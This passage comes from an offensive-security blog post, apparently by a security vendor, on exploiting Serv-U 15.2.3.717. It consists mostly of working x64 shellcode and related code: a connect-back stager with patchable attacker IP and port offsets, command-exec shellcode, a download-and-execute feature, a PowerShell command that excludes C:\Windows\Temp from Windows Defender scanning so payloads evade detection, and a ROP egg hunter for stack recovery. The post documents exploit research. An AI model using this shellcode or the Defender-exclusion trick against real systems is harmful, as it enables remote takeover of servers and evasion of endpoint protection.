"\x6a\x04\x41\x58\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5"
"\x83\xf8\x00\x7e\x55\x48\x83\xc4\x20\x5e\x89\xf6\x6a\x40\x41"
"\x59\x68\x00\x10\x00\x00\x41\x58\x48\x89\xf2\x48\x31\xc9\x41"
"\xba\x58\xa4\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31"
"\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9\xc8"
"\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x41\x57\x59\x68\x00\x40"
"\x00\x00\x41\x58\x6a\x00\x5a\x41\xba\x0b\x2f\x0f\x30\xff\xd5"
"\x57\x59\x41\xba\x75\x6e\x4d\x61\xff\xd5\x49\xff\xce\xe9\x3c"
"\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6\x75\xb4\x41"
"\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2\xf0\xb5\xa2\x56\xff\xd5";
The port and IP address to which the shellcode connects to download the second-stage shellcode are at these offsets:
"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f\x85\x72\x00\x00\x00\x8b"
"\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b"
"\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41"
"\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1"
"\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45"
"\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b"
"\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48"
"\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9"
"\x4b\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00\x00"
"\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49\x89\xe5"
"\x49\xbc\x02\x00"
"PP" # connect-back port @ offs 244
"HHHH" # connect-back IP address @ offs 246
"\x41\x54\x49\x89\xe4"
"\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c\x89\xea\x68"
"\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff\xd5\x6a\x0a"
"\x41\x5e\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89"
"\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5"
"\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba"
"\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5"
"\xe8\x93\x00\x00\x00\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9"
"\x6a\x04\x41\x58\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5"
"\x83\xf8\x00\x7e\x55\x48\x83\xc4\x20\x5e\x89\xf6\x6a\x40\x41"
"\x59\x68\x00\x10\x00\x00\x41\x58\x48\x89\xf2\x48\x31\xc9\x41"
"\xba\x58\xa4\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31"
"\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9\xc8"
"\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x41\x57\x59\x68\x00\x40"
"\x00\x00\x41\x58\x6a\x00\x5a\x41\xba\x0b\x2f\x0f\x30\xff\xd5"
"\x57\x59\x41\xba\x75\x6e\x4d\x61\xff\xd5\x49\xff\xce\xe9\x3c"
"\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6\x75\xb4\x41"
"\xff\xe7\x58"
My exploit simply patches in the IP:port specified on the command line at runtime. This makes it easy for the user/attacker to use arbitrary shellcode stagers / Sliver instances / Metasploit instances at runtime without having to generate new shellcode every time.
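The six bytes in question are just a port and an IPv4 address in network byte order, the same encoding a sockaddr_in uses. A short Python sketch with helper names of my own, shown on the six bytes from the msfvenom output above rather than on any shellcode:

```python
import socket
import struct


def pack_endpoint(ip: str, port: int) -> bytes:
    """Encode port (2 bytes, big-endian) followed by the IPv4 address (4 bytes)."""
    return struct.pack(">H", port) + socket.inet_aton(ip)


def unpack_endpoint(field: bytes):
    """Decode a 6-byte port + IPv4 field back into (ip, port)."""
    (port,) = struct.unpack(">H", field[:2])
    return socket.inet_ntoa(field[2:6]), port


# The bytes that follow \x49\xbc\x02\x00 in the generated stager.
original_field = bytes.fromhex("01bbc0994c16")
print(unpack_endpoint(original_field))
```

Decoding the original field gives back the LHOST and LPORT passed to msfvenom, which confirms the offsets annotated in the listing.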
I used the same trick for the command exec shellcode, which simply tacks on the user-specified commands to the end of the shellcode:
shellcode = (
b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
b"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
b"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
b"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
b"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
b"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
b"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
b"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
b"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
b"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
b"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
b"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
b"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
b"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
b"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
b"\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff"
b"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
b"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5"
)
rop[offs_NOP_sled+offs_NOP_sled_padding+267:] = shellcode + cmd.encode() + b"\x00"
Again, this saves the user generating new shellcode every time. Finally, I implemented a download + exec feature, which accepts a user-specified URL, downloads an executable from the URL to C:\Windows\Temp, then runs it. One little wrinkle I added is a PowerShell command to disable Windows Defender virus/malware scans from running in C:\Windows\Temp so you can run completely unobfuscated Sliver/Meterpreter payloads without getting tripped up by Microsoft endpoint security.
The PowerShell command to do this is:
powershell -Command "& {Add-MpPreference -ExclusionPath c:\windows\temp}"
Without that command you'll find Windows Defender alerts on almost any payload you care to drop. Note: I don't recommend this for red team engagements because you'll still get caught by a zillion other controls. But for simple use cases, it's more than sufficient to pop a connect-back shell or Sliver session.
Sometimes it's necessary to return the stack pointer to whence it came so that the exploited process can resume execution and handle any errors/exceptions tidily. This exploit crashes Serv-U, but it automatically restarts. This is unacceptable in a lot of scenarios and making it not crash is left as an exercise for the reader.
However, returning the stack to normal is an interesting problem because in ROP we don't usually save the stack pointer before pivoting to a different stack - the malicious ROP one. Getting it back generally involves querying the Thread Environment Block ("TEB") via the gs: segment register on 64-bit Intel/AMD Windows. The TEB is maintained by the operating system and holds per-thread metadata, including the bounds of the thread's stack and a pointer to the Process Environment Block ("PEB").
On x64 Windows the TEB starts at gs:[0] and stores a pointer to itself (its linear address) at gs:[0x30]; the PEB pointer sits at gs:[0x60]. The TEB records the stack base at offset 0x08 and the stack limit, the lowest address of the thread's stack, at offset 0x10. The following code reads the stack limit, which is a safe starting point for locating the old stack frames:
# recover the original stack
mov rax, 0x30
mov rax, qword gs:[rax] # Read the TEB's own address (self pointer) out of the TEB
add rax, 0x10 # Offset in the TEB of the stack limit (lowest stack address)
mov rax, qword ptr [rax] # Dereference [rax] to read the stack limit
mov rdi, rax # Store the scan start address in rdi
In order to return rsp to the same address it contained at the very beginning of the exploit - at the point when call r9 first occurred - I need to find the precise address of the top of the old stack frame. This turns out to be easy because the stack contains return addresses into Serv-U.dll, which as we saw earlier does not support ASLR.
As a result I can simply look at a stack trace taken at the point call r9 is executed and make note of the addresses there. For example, consider this stack trace taken from exactly the scenario just described:
0:013> k
# Child-SP RetAddr Call Site
00 0000009d`d2aff320 00000000`72111cb8 LIBEAY32!CRYPTO_ctr128_encrypt+0xc6
01 0000009d`d2aff380 00000000`7218f41b LIBEAY32!EVP_rc4_40+0x488
02 0000009d`d2aff3d0 00000000`7210efaa LIBEAY32!FINGERPRINT_premain+0x291b
03 0000009d`d2aff410 00000001`8016086c LIBEAY32!EVP_EncryptUpdate+0xda
04 0000009d`d2aff460 00000001`80141795 Serv_U!CUPnPNotifyEvent::SetTimeout+0x22b7c
05 0000009d`d2aff4a0 00000001`80141263 Serv_U!CUPnPNotifyEvent::SetTimeout+0x3aa5
06 0000009d`d2aff4e0 00000001`80144fb0 Serv_U!CUPnPNotifyEvent::SetTimeout+0x3573
07 0000009d`d2aff580 00000200`577f8dd7 Serv_U!CUPnPNotifyEvent::SetTimeout+0x72c0
08 0000009d`d2aff650 00000200`577f8c5c RhinoNET!CRhinoSocket::ProcessReceiveBuffer+0x33
09 0000009d`d2aff690 00000200`577f6c4e RhinoNET!CRhinoSocket::OnReceive+0x170
0a 0000009d`d2aff6e0 00000200`577f32eb RhinoNET!CRhinoProductSocket::OnReceive+0x3e
0b 0000009d`d2aff710 00000200`577f356b RhinoNET!CAsyncSocketX::DoCallBack+0x107
0c 0000009d`d2aff740 00000200`577f350f RhinoNET!CAsyncSocketX::ProcessAuxQueue+0x53
0d 0000009d`d2aff770 00007fff`5ffda399 RhinoNET!CSocketWndX::OnSocketNotify+0x13
0e 0000009d`d2aff7a0 00007fff`5ffd97af mfc140u!CWnd::OnWndMsg+0xba9 [D:\a01\_work\6\s\src\vctools\VC7Libs\Ship\ATLMFC\Src\MFC\wincore.cpp @ 2698]
0f 0000009d`d2aff920 00007fff`5ffd7093 mfc140u!CWnd::WindowProc+0x3f [D:\a01\_work\6\s\src\vctools\VC7Libs\Ship\ATLMFC\Src\MFC\wincore.cpp @ 2099]
10 0000009d`d2aff960 00007fff`5ffd7464 mfc140u!AfxCallWndProc+0x123 [D:\a01\_work\6\s\src\vctools\VC7Libs\Ship\ATLMFC\Src\MFC\wincore.cpp @ 265]
11 0000009d`d2affa50 00007fff`5fe7a509 mfc140u!AfxWndProc+0x54 [D:\a01\_work\6\s\src\vctools\VC7Libs\Ship\ATLMFC\Src\MFC\wincore.cpp @ 417]
12 0000009d`d2affa90 00007fff`90c60089 mfc140u!AfxWndProcBase+0x49 [D:\a01\_work\6\s\src\vctools\VC7Libs\Ship\ATLMFC\Src\MFC\afxstate.cpp @ 299]
13 0000009d`d2affad0 00007fff`90c5fa02 USER32!UserCallWinProcCheckWow+0x319
14 0000009d`d2affc60 00000001`8016ea75 USER32!DispatchMessageWorker+0x1d2
15 0000009d`d2affce0 00000001`8016eaed Serv_U!CUPnPNotifyEvent::SetTimeout+0x30d85
16 0000009d`d2affd50 00007fff`8ee36b4c Serv_U!CUPnPNotifyEvent::SetTimeout+0x30dfd
17 0000009d`d2affd80 00007fff`90954ed0 ucrtbase!thread_start<unsigned int (__cdecl*)(void *),1>+0x4c
18 0000009d`d2affdb0 00007fff`9124e20b KERNEL32!BaseThreadInitThunk+0x10
19 0000009d`d2affde0 00000000`00000000 ntdll!RtlUserThreadStart+0x2b
The first Serv-U stack frame is at index #4, at Serv_U!CUPnPNotifyEvent::SetTimeout+0x22b7c, and its RetAddr column holds a return address inside Serv-U.dll:
04 0000009d`d2aff460 00000001`80141795 Serv_U!CUPnPNotifyEvent::SetTimeout+0x22b7c
The return address is 0x180141795 and always will be due to the absence of ASLR. Therefore to find the original stack I just hunt for 0x80141795 (the low 32 bits of the address 0x0180141795, which fit in a single DWORD) starting at the stack address read in the previous step. I built the following egg hunter:
# Egg hunter for the value 0x80141795 starting at the stack address in rdi.
# No egg-not-found error handling because if this code is running then the
# stack frame we're looking for is guaranteed to exist.
mov eax, 0x80141795 # low dword of the saved return address we want to find
mov rcx, 0x4000 # maximum number of dwords to scan (0x10000 bytes)
cld # clear DF, direction flag, so rdi increments
repne scasd eax, dword [rdi] # scan dwords from [rdi] until one equals eax
mov rax, rdi # rdi now points one dword past the match; copy it to rax
mov rdx, 0x140 # the top of the original stack frame is...
sub rax, rdx # ...0x140 bytes lower in memory
mov rsp, rax # pivot to the new (old!) stack
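To make the scan semantics concrete, here is a minimal Python model of what repne scasd does over a toy buffer. It is only a sketch: the function name repne_scasd, the filler values, and the buffer layout are made up for illustration, and the bounds check exists only because the model works on a finite bytes object.

```python
import struct

def repne_scasd(memory: bytes, start: int, eax: int, rcx: int):
    """Model `repne scasd` with DF=0 over a bytes buffer.

    Returns (found, rdi), where rdi is the offset *after* the last
    dword that was compared, mirroring how the CPU advances rdi.
    """
    rdi = start
    found = False
    # The length check is a modelling convenience; real hardware would fault.
    while rcx > 0 and rdi + 4 <= len(memory):
        (value,) = struct.unpack_from("<I", memory, rdi)
        rdi += 4   # scasd advances rdi after every comparison
        rcx -= 1
        if value == eax:
            found = True
            break
    return found, rdi

RET_ADDR = 0x180141795
EGG = RET_ADDR & 0xFFFFFFFF  # low dword, the value loaded into eax

# Toy "stack": six filler qwords, then the saved return address.
toy_stack = struct.pack("<6Q", *([0x4141414141414141] * 6))
toy_stack += struct.pack("<Q", RET_ADDR) + struct.pack("<Q", 0)

found, rdi = repne_scasd(toy_stack, 0, EGG, 0x4000)
print(found, rdi, rdi - 4)
```

In this toy layout the egg sits at offset 48, and the model stops with rdi at 52, one dword past the match, which is worth keeping in mind when computing any offset relative to rdi.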
You'll notice that some math is being done to subtract 0x140 from rax before writing it to rsp. This is to account for the fact that our egg - the saved return address - was not at the top of the stack frame list. In fact, it was index #4 and I need rsp to point at the frame index #0:
# Child-SP RetAddr Call Site
00 0000009d`d2aff320 00000000`72111cb8 LIBEAY32!CRYPTO_ctr128_encrypt+0xc6
...
04 0000009d`d2aff460 00000001`80141795 Serv_U!CUPnPNotifyEvent::SetTimeout+0x22b7c
The offset on the stack between #4 and #0 is 0x9dd2aff460 - 0x9dd2aff320 = 0x140, so I subtract that amount from rax before setting the stack pointer, rsp.
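The same subtraction can be reproduced straight from the two stack trace lines, which is handy if the trace changes. This is a small sketch; the helper name child_sp is hypothetical, and it assumes the WinDbg k column layout shown above (frame index, Child-SP, RetAddr, call site).

```python
def child_sp(trace_line: str) -> int:
    """Return the Child-SP column of one WinDbg `k` line as an integer."""
    # WinDbg separates the high and low halves of a 64-bit value with a backtick.
    return int(trace_line.split()[1].replace("`", ""), 16)

frame0 = "00 0000009d`d2aff320 00000000`72111cb8 LIBEAY32!CRYPTO_ctr128_encrypt+0xc6"
frame4 = "04 0000009d`d2aff460 00000001`80141795 Serv_U!CUPnPNotifyEvent::SetTimeout+0x22b7c"

pivot_offset = child_sp(frame4) - child_sp(frame0)
print(hex(pivot_offset))  # 0x140
```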
One of the beautiful things about Radare2 is that its rasm2 assembler turns assembly source into opcode bytes ready for use as shellcode. So the above code becomes:
% cat /tmp/s.asm
mov eax, 0x80141795
mov rcx, 0x4000
cld
repne scasd eax, dword [rdi]
mov rax, rdi
mov rdx, 0x140
sub rax, rdx
mov rsp, rax
% cat /tmp/s.asm | rasm2 -a x86 -b 64 -
b89517148048c7c100400000fcf2af4889f848c7c2400100004829d04889c4
Simple and elegant.
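Since the exploit is written in Python, the rasm2 output can be dropped in as a bytes object. The snippet below is a sketch of that conversion with a quick sanity check; the variable names are mine, not taken from the exploit source.

```python
# Hex string exactly as printed by rasm2 for the egg hunter.
EGG_HUNTER_HEX = "b89517148048c7c100400000fcf2af4889f848c7c2400100004829d04889c4"

egg_hunter = bytes.fromhex(EGG_HUNTER_HEX)

# The first instruction is `mov eax, imm32`: opcode 0xb8 followed by a
# little-endian 32-bit immediate, which should be the egg value.
egg = int.from_bytes(egg_hunter[1:5], "little")
print(len(egg_hunter), hex(egg))  # 31 0x80141795
```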
Lastly, I could return most of the registers to their pre-exploit values before returning control of execution to the old stack; doing so is left as an exercise for the reader.
This was a fun exploit, and I got lucky a few times! The fact that ASLR was disabled on the Serv-U DLL was crazy lucky and saved a lot of hassle.
Other mitigations, such as Control Flow Guard ("CFG"), were also disabled. This again made it easy to write an exploit without having to work around restricted access to critical functions, such as GetProcAddress().
It's worth pointing out that the method I use to calculate the address of the ROP stack can, on occasion, generate an address that isn't 16-byte aligned. As a result, when GetProcAddress() reaches a MOVAPS instruction (which requires its memory operand to be 16-byte aligned) the exploit crashes. To make the exploit more reliable, the solution is to force the ROP stack to be located at an aligned address; this would require some wrangling and is left as an exercise for the reader.
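As a rough illustration of the alignment problem, the following sketch checks and rounds down an address in Python, assuming the usual 16-byte requirement that MOVAPS places on its memory operand. The helper names are hypothetical and the exploit itself does not contain this code; forcing alignment inside a ROP chain would need an equivalent gadget sequence.

```python
ALIGNMENT = 16  # assumed: MOVAPS faults on memory operands not aligned to 16 bytes

def is_aligned(addr: int, alignment: int = ALIGNMENT) -> bool:
    """True if addr is a multiple of alignment."""
    return addr % alignment == 0

def align_down(addr: int, alignment: int = ALIGNMENT) -> int:
    """Round addr down to the nearest multiple of alignment (a power of two)."""
    return addr & ~(alignment - 1)

candidate = 0x9DD2AFF32C  # made-up, misaligned ROP stack address
print(is_aligned(candidate), hex(align_down(candidate)))
```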
It should also be pointed out that the exploit is currently hard-coded for Serv-U 15.2.3.717. To build against other Serv-U versions would require a little work to recalculate the ROP gadget addresses in Serv-U.dll. Hopefully, we'd find the same gadgets in the other versions of Serv-U, but I haven't looked yet.
Let us know what you think; you can connect with us on social media and follow us on GitHub for more exploits!
For more information on our continuous offensive security platform, you can get in touch with us via the Cosmos page.